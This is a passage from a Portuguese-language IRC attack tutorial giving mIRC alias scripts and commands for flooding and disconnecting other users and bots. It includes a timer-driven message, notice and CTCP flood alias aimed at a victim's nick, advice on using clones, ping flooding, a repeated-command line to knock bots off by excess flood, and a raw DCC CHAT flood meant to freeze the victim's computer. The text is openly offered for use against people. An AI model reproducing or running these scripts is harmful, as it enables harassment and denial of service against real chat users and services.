Atacando
um Usuario. |
Para usar esse ataque basta você digitar no seu aliases ( /aliases ou alt+a ) :
------- CODE -------
/overflood {
/timer 0 5 /msg $1
8,9%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%
/timer 0 5 /notice $1
8,9%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%
/timer 0 5 /ctcp $1 flood
8,9%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%
}
/timeroff {
/timer1 off
/timer2 off
/timer3 off
}
------- CODE -------
Para atacar o ataque digite /overflood
nick_da_vitima e para parar digite /timeroff
Exemplo(nick da vítima _pUr3_BloOd_):
/overflood _pUr3_BloOd_
(espere uns 30 segundos)
/timeroff
Seria de grande ajuda alguns clones, basta
abrir 3 status no mirc, ou abrir 3 scripts ( e se tiver jeito mais 3 clones
) vc deve conectar-se ao mesmo servidor de IRC e digitar /overflood
_pUr3_BloOd_ nos 3 e deixar... até você cair, depois volte e faça
de novo. Esse ataque raramente faz a pessoa cair, mas deixa seu cliente
de IRC muito lerdo.
3º
ATAQUE - PING
Pingando um usuário em uma grande quantia
de vezes em menos segundos é possível derruba-lo, consiste em digitar:
/ping nickdocara
digite isso e envie, faça esse processo varia vezes, e então... ou VOCÊ
cai, ou ELE cai.
4º
ATAQUE - DERRUBANDO BOTS MAL CONFIGURADOS
Sabe aqueles bots chatos que tem comandos
internos tipo: help, play, cadastro, etc? é muito simples derruba-los se
eles não tiverem uma proteção contra flood, consiste em mandar varias vezes
um comando configurado no bot, no PVT do mesmo, esse é o comando exemplo(aqui
estamos derrubando um bot chamado BOT_ETUDO e ele tem um comando interno
chamado help):
//msg BOT_ETUDO help | /msg BOT_ETUDO help
| /msg BOT_ETUDO help | /msg BOT_ETUDO help | /msg BOT_ETUDO help | /msg
BOT_ETUDO help | /msg BOT_ETUDO help | /msg BOT_ETUDO help | /msg BOT_ETUDO
help | /msg BOT_ETUDO help | /msg BOT_ETUDO help | /msg BOT_ETUDO help |
/msg BOT_ETUDO help | /msg BOT_ETUDO help | /msg BOT_ETUDO help |
Após digitado isso seu cliente de IRC abrirá
automaticamente PVT com o BOT_ETUDO e mandara o comando help várias vezes,
assim derrubando o bot por “excess flood”.
5º
ATAQUE - Flood por DCC
Um código muito poderoso feito a pouco tempo
atrás faz um flood muito grande, consiste em digitar:
//raw -q privmsg Nick : $+ $chr(1) $+ DCC CHAT chat $longip($ip) 4322 $+ $chr(1)
Troque: NICK pelo nick da vitima e se a pessoa aceitar ela sofrera um flood tão grande que é capaz do PC dela travar...kkkkkkkkkkkkkkk.....